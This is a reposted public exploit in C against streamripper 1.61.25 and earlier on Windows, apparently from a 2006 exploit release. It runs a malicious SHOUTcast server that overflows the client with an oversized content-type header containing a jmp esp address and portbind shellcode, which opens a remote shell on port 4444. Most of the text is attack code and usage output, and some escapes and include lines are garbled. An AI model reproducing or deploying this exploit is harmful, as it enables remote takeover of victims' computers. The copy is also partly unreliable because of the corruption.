* name: streamripper <= 1.61.25 win32 remote exploit
*
* bug by: Ulf Harnhammar
* status: public
* exploit: psylocn
* payload: portbind 4444
* **********************************************************
* K:>exploit.exe 80 0
* [ public-release ]
* streamripper <= 1.61.25 remote exploit
* exploit by psylocn 2006
* bug by Ulf Harnhammar
*
* [+] server started!
* [+] server waits
*
*
* go to next shell
* K:>streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/[@more@]
/* #define _WIN32 */
#include
#include
#include
#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#endif
/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xaf"
"xbfxf8x2ax83xebxfcxe2xf4x53xd5x13x67x47x46x07xd5"
"x50xdfx73x46x8bx9bx73x6fx93x34x84x2fxd7xbex17xa1"
"xe0xa7x73x75x8fxbex13x63x24x8bx73x2bx41x8ex38xb3"
"x03x3bx38x5exa8x7ex32x27xaex7dx13xdex94xebxdcx02"
"xdax5ax73x75x8bxbex13x4cx24xb3xb3xa1xf0xa3xf9xc1"
"xacx93x73xa3xc3x9bxe4x4bx6cx8ex23x4ex24xfcxc8xa1"
"xefxb3x73x5axb3x12x73x6axa7xe1x90xa4xe1xb1x14x7a"
"x50x69x9ex79xc9xd7xcbx18xc7xc8x8bx18xf0xebx07xfa"
"xc7x74x15xd6x94xefx07xfcxf0x36x1dx4cx2ex52xf0x28"
"xfaxd5xfaxd5x7fxd7x21x23x5ax12xafxd5x79xecxabx79"
"xfcxecxbbx79xecxecx07xfaxc9xd7xe9x76xc9xecx71xcb"
"x3axd7x5cx30xdfx78xafxd5x79xd5xe8x7bxfax40x28x42"
"x0bx12xd6xc3xf8x40x2ex79xfax40x28x42x4axf6x7ex63"
"xf8x40x2ex7axfbxebxadxd5x7fx2cx90xcdxd6x79x81x7d"
"x50x69xadxd5x7fxd9x92x4exc9xd7x9bx47x26x5ax92x7a"
"xf6x96x34xa3x48xd5xbcxa3x4dx8ex38xd9x05x41xbax07"
"x51xfdxd4xb9x22xc5xc0x81x04x14x90x58x51x0cxeexd5"
"xdaxfbx07xfcxf4xe8xaax7bxfexeex92x2bxfexeexadx7b"
"x50x6fx90x87x76xbax36x79x50x69x92xd5x50x88x07xfa"
"x24xe8x04xa9x6bxdbx07xfcxfdx40x28x42x5fx35xfcx75"
"xfcx40x2exd5x7fxbfxf8x2axccxccxccxccxccxccxccxcc";
char part1[] = "ICY 200 OKrnicy-notice1:aaaaarn"
"icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
rn"
"icy-name:Radioseven - www.radio.dern"
"icy-genre:Dance Trance Housern"
"icy-url:http://www.radio.dern"
"content-type:"; //buffer to exploit
char part2[] = "rn"
"icy-pub:1rn"
"icy-metaint:8192rn"
"icy-br:CCCCCCCrnrn";
char fixstack[] = "x81xc4xffxefxffxffx44"; //sub esp, 4097 + inc esp
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
{ 1, "debug [testing] ", 0x41414141 },
};
void Usage(){
int i;
printf("Usage: exploit.exe port targetnn"
"Targets:nn");
for (i = 0; i < 2; i++)
{
if(target[i].name != 0)
fprintf(stderr," [%u] %sn",i,target[i].name);
else
break;
}
exit(1);
}
int main (int argc, char **argv) {
char *host;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
int sockfd,port,new_sock,sin_size=sizeof (their_addr);
char buffer[3565];
#ifdef _WIN32
WSADATA wsa;
#endif
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("[ public-release ]n");
printf("tstreamripper <= 1.61.25 remote exploit n");
printf("texploit by psylocn 2006n");
printf("tbug by Ulf Harnhammarnn");
unsigned long ntarget = 0;
if (argc < 3) Usage();
if ((ntarget = atoi(argv[2])) > 1) Usage();
port = (unsigned short)atoi(argv[1]);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket errorn");
return 0;
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
printf("n[-] bind errorn");
return 0;
}
else printf ("[+] server started!n");
if (listen (sockfd, 3) == SOCKET_ERROR) {
printf("n[-] listen errorn");
return 0;
}
printf ("[+] server waitsn");
if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
printf("n[-] accept errorn");
return 0;
}
else
printf ("[+] client conneted!n");
memset ( buffer, 0x90, sizeof(buffer) - 1 );
memcpy ( buffer, part1, strlen(part1) );
memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
memcpy ( buffer+3150, fixstack,strlen(fixstack) );
memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));
memcpy ( buffer+3515, part2, sizeof(part2) );
if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
printf("[-] send errorn");
return 0;
}
sleep(2000);
printf("[+] exploit send check shell on port 4444n");
closesocket(sockfd);
#ifdef _WIN32
WSACleanup ();
#endif
return 0;
}
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-861820/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/83980/viewspace-861820/
扫一扫
365
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
